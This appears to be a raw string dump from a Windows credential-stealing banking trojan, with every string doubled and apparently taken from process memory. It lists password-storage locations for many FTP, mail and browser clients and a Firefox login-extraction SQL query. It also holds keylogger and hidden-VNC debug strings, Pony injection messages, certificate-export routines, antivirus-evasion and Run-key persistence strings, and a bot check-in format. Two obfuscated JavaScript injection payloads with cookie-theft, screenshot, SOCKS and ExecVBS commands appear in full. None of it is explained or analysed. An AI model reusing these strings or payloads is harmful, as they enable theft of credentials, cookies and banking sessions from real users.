Software\SoftX.org\FTPClient\Sites

PortNumber

PortNumber

PassWord

PassWord

Software\South River Technologies\WebDrive\Connections

Software\South River Technologies\WebDrive\Connections

Software\LinasFTP\Site Manager

Software\LinasFTP\Site Manager

FTP destination password

FTP destination password

FTP destination server

FTP destination server

FTP destination port

FTP destination port

FTP destination user

FTP destination user

FTP destination catalog

FTP destination catalog

FTP profiles

FTP profiles

Msi.dll

Msi.dll

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

\PocoSystem.ini

\PocoSystem.ini

accounts.ini

accounts.ini

sites.dat

sites.dat

\LeapWare\LeapFTP

\LeapWare\LeapFTP

unleap.exe

unleap.exe

leapftp

leapftp

FtpIniName

FtpIniName

Software\Ghisler\Windows Commander

Software\Ghisler\Windows Commander

wcx_PTF.ini

wcx_PTF.ini

Server.Pass

Server.Pass

Server.Host

Server.Host

Server.User

Server.User

Server.Port

Server.Port

Last Server Pass

Last Server Pass

Last Server Port

Last Server Port

\sitemanager.xml

\sitemanager.xml

\recentservers.xml

\recentservers.xml

\filezilla.xml

\filezilla.xml

"password" : "

"password" : "

"password":"

"password":"

\drives.js

\drives.js

\ExpanDrive\favorites.js

\ExpanDrive\favorites.js

\ExpanDrive\drives.js

\ExpanDrive\drives.js

wiseftpsrvs.ini

wiseftpsrvs.ini

wisePTF.ini

wisePTF.ini

wiseftpsrvs.bin

wiseftpsrvs.bin

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

FTP Count

FTP Count

FTP File%u

FTP File%u

Robo-FTP

Robo-FTP

SOFTWARE\%s\FTPServers

SOFTWARE\%s\FTPServers

user.config

user.config

.duck

.duck

SiteServer %u\Host

SiteServer %u\Host

SiteServer %u\WebUrl

SiteServer %u\WebUrl

SiteServer %u\Remote Directory

SiteServer %u\Remote Directory

SiteServer %u-User

SiteServer %u-User

SiteServer %u-User PW

SiteServer %u-User PW

SiteServer %u\SFTP

SiteServer %u\SFTP

Keychain

Keychain

Software\Nico Mak Computing\WinZip\FTP

Software\Nico Mak Computing\WinZip\FTP

Password

Password

Software\Far\Plugins\FTP\Hosts

Software\Far\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far\SavedDialogHistory\FTPHost

Software\Far\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

\win.ini

\win.ini

WS_FTP

WS_FTP

\Ipswitch\WS_FTP

\Ipswitch\WS_FTP

\GlobalSCAPE\CuteFTP

\GlobalSCAPE\CuteFTP

sm.dat

sm.dat

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Lite

\GlobalSCAPE\CuteFTP Lite

\CuteFTP

\CuteFTP

CUTEFTP

CUTEFTP

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

\Sites.dat

\Sites.dat

\Quick.dat

\Quick.dat

\History.dat

\History.dat

Software\BPFTP\Bullet Proof FTP\Main

Software\BPFTP\Bullet Proof FTP\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BPFTP\Bullet Proof FTP\Options

Software\BPFTP\Bullet Proof FTP\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BPFTP

Software\BPFTP

\SmartFTP

\SmartFTP

Favorites.dat

Favorites.dat

History.dat

History.dat

Software\TurboFTP

Software\TurboFTP

\TurboFTP

\TurboFTP

addrbk.dat

addrbk.dat

quick.dat

quick.dat

Port

Port

Login

Login

PasswordType

PasswordType

profiles.xml

profiles.xml

\FTP Explorer

\FTP Explorer

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\Profiles

Software\FTP Explorer\Profiles

FtpSite.xml

FtpSite.xml

PK11_GetInternalKeySlot

PK11_GetInternalKeySlot

sqlite3.dll

sqlite3.dll

sqlite3_prepare

sqlite3_prepare

sqlite3_step

sqlite3_step

sqlite3_column_bytes

sqlite3_column_bytes

sqlite3_column_blob

sqlite3_column_blob

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

PTF://

PTF://

signons.sqlite

signons.sqlite

\profiles.ini

\profiles.ini

PathToExe

PathToExe

\Mozilla\Firefox\

\Mozilla\Firefox\

Firefox

Firefox

Software\Mozilla

Software\Mozilla

fireFTPsites.dat

fireFTPsites.dat

\Mozilla\SeaMonkey\

\Mozilla\SeaMonkey\

SeaMonkey

SeaMonkey

\Mozilla\Profiles\

\Mozilla\Profiles\

Mozilla

Mozilla

password 51:b:

password 51:b:

SMTP Email Address

SMTP Email Address

SMTP Server

SMTP Server

SMTP User Name

SMTP User Name

HTTP User

HTTP User

HTTP Server URL

HTTP Server URL

HTTPMail User Name

HTTPMail User Name

HTTPMail Server

HTTPMail Server

SMTP User

SMTP User

POP3 Port

POP3 Port

SMTP Port

SMTP Port

IMAP Port

IMAP Port

POP3 Password2

POP3 Password2

IMAP Password2

IMAP Password2

NNTP Password2

NNTP Password2

HTTPMail Password2

HTTPMail Password2

SMTP Password2

SMTP Password2

POP3 Password

POP3 Password

IMAP Password

IMAP Password

NNTP Password

NNTP Password

HTTPMail Password

HTTPMail Password

SMTP Password

SMTP Password

{X-X-X-XX-XXXXXX}

{X-X-X-XX-XXXXXX}

inetcomm server passwords

inetcomm server passwords

outlook account manager passwords

outlook account manager passwords

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Pstorec.dll

Pstorec.dll

[VNC] EXEC: %s

[VNC] EXEC: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[VDESK] Read CMD %u[%u]

[VDESK] Read CMD %u[%u]

[VDESK] NOT AUTH CMD %u

[VDESK] NOT AUTH CMD %u

GetAsyncKeyState

GetAsyncKeyState

USER32.DLL

USER32.DLL

GetKeyboardState

GetKeyboardState

GetKeyState

GetKeyState

?WINMM.DLL

?WINMM.DLL

?DSOUND.DLL

?DSOUND.DLL

ZwConnectPort

ZwConnectPort

NTDLL.DLL

NTDLL.DLL

[VNC] PROCESS=%s

[VNC] PROCESS=%s

\explorer.exe

\explorer.exe

[VNC] SearchApp Status = %u

[VNC] SearchApp Status = %u

[VNC] FileName = %s

[VNC] FileName = %s

[VNC] CmdLine = %s

[VNC] CmdLine = %s

[VNC] W64 Redir OLD=%u

[VNC] W64 Redir OLD=%u

[VNC] CreateProcess Status = %u (%u)

[VNC] CreateProcess Status = %u (%u)

SysShadow

SysShadow

Chrome_WidgetWin_1

Chrome_WidgetWin_1

Chrome_WidgetWin_0

Chrome_WidgetWin_0

d3d10_1.dll

d3d10_1.dll

d3d10_1core.dll

d3d10_1core.dll

d3d10.dll

d3d10.dll

d3d10core.dll

d3d10core.dll

d2d1.dll

d2d1.dll

OPENGL32.dll

OPENGL32.dll

d3d9.dll

d3d9.dll

d3d11.dll

d3d11.dll

Dxtrans.dll

Dxtrans.dll

WinExec

WinExec

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

RegCloseKey

RegCloseKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

NETAPI32.dll

NETAPI32.dll

SHDeleteKeyA

SHDeleteKeyA

SHLWAPI.dll

SHLWAPI.dll

DeleteUrlCacheEntry

DeleteUrlCacheEntry

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

MSVCRT.dll

MSVCRT.dll

IPHLPAPI.DLL

IPHLPAPI.DLL

AVIFIL32.dll

AVIFIL32.dll

GetWindowsDirectoryW

GetWindowsDirectoryW

CallNamedPipeA

CallNamedPipeA

ConnectNamedPipe

ConnectNamedPipe

CreateNamedPipeW

CreateNamedPipeW

DisconnectNamedPipe

DisconnectNamedPipe

CreateNamedPipeA

CreateNamedPipeA

GetWindowsDirectoryA

GetWindowsDirectoryA

EnumWindows

EnumWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

SetViewportOrgEx

SetViewportOrgEx

RegEnumKeyExA

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyA

RegCreateKeyExA

RegCreateKeyExA

RegOpenKeyExA

RegOpenKeyExA

CryptImportKey

CryptImportKey

CryptDestroyKey

CryptDestroyKey

RegOpenKeyA

RegOpenKeyA

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

CertOpenSystemStoreA

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertDeleteCertificateFromStore

CertAddCertificateContextToStore

CertAddCertificateContextToStore

CertCloseStore

CertCloseStore

CertEnumCertificatesInStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXExportCertStoreEx

CRYPT32.dll

CRYPT32.dll

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

FindCloseUrlCache

FindCloseUrlCache

FindNextUrlCacheEntryW

FindNextUrlCacheEntryW

FindFirstUrlCacheEntryW

FindFirstUrlCacheEntryW

COMDLG32.dll

COMDLG32.dll

WININET.DLL

WININET.DLL

=)=2===~=

=)=2===~=

3 343=3_3

3 343=3_3

= =,=`=}=

= =,=`=}=

.pdata

.pdata

@.reloc

@.reloc

[%s - X64 EQ PID: %u TID: %u]

[%s - X64 EQ PID: %u TID: %u]

\SysWOW64\regsvr32.exe

\SysWOW64\regsvr32.exe

[Pony] Fail create process: %u

[Pony] Fail create process: %u

[PONY] Fail inject to process: %u

[PONY] Fail inject to process: %u

echrome.dll

echrome.dll

iexplore.exe

iexplore.exe

chrome.exe

chrome.exe

\System32\KERNEL32.DLL

\System32\KERNEL32.DLL

\System32\kernelbase.dll

\System32\kernelbase.dll

\ThemeApiPort

\ThemeApiPort

wmiprvse.exe_628_rwx_01140000_0007C000:

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

HHt.HHt

HHt.HHt

More information: hXXp://VVV.ibsensoftware.com/

More information: hXXp://VVV.ibsensoftware.com/

8HttpAddRequestHeadersA

8HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

HttpOpenRequestW

HttpOpenRequestW

HttpQueryInfoA

HttpQueryInfoA

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

HttpSendRequestW

HttpSendRequestW

wininet.dll

wininet.dll

rapport

rapport

ieframe.dll

ieframe.dll

NSPR4.DLL

NSPR4.DLL

nss3.dll

nss3.dll

KERNEL32.DLL

KERNEL32.DLL

\Google\Chrome\User Data\Default\

\Google\Chrome\User Data\Default\

\Mozilla\Firefox\Profiles\

\Mozilla\Firefox\Profiles\

sol_chrome/

sol_chrome/

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

.rdata

.rdata

@http

@http

SELECT url FROM moz_places

SELECT url FROM moz_places

places.sqlite

places.sqlite

ie/history.txt

ie/history.txt

ff/history.txt

ff/history.txt

ff/%u/places.sqlite

ff/%u/places.sqlite

framework_key%

framework_key%

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval('var %s '

eval('var %s '

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

%s.Key = '%s';

%s.Key = '%s';

%s.Hide('%0.8X%0.8X');

%s.Hide('%0.8X%0.8X');

CertificateAuthority

CertificateAuthority

%s.pfx

%s.pfx

cookies.sqlite

cookies.sqlite

cookies.sqlite-journal

cookies.sqlite-journal

ff/%u/cookies.sqlite

ff/%u/cookies.sqlite

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

[%s - X32 EQ PID: %u TID: %u]

[%s - X32 EQ PID: %u TID: %u]

X-Firefox-Spdy

X-Firefox-Spdy

X-WebKit-CSP

X-WebKit-CSP

hXXps://

hXXps://

HTTP/1.1 200 OK

HTTP/1.1 200 OK

Content-Length: %u

Content-Length: %u

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.0

GET /favicon.ico HTTP/1.0

login=%s&pass=%s

login=%s&pass=%s

chrome.dll

chrome.dll

127.0.0.1

127.0.0.1

DrWeb

DrWeb

McAfee.com

McAfee.com

Doctor Web

Doctor Web

Common Files\Doctor Web

Common Files\Doctor Web

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Run

regsvr32.exe "%s"

regsvr32.exe "%s"

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

[VNC] Parse param error: %s

[VNC] Parse param error: %s

\regsvr32.exe

\regsvr32.exe

[VNC] Fail create process: %u

[VNC] Fail create process: %u
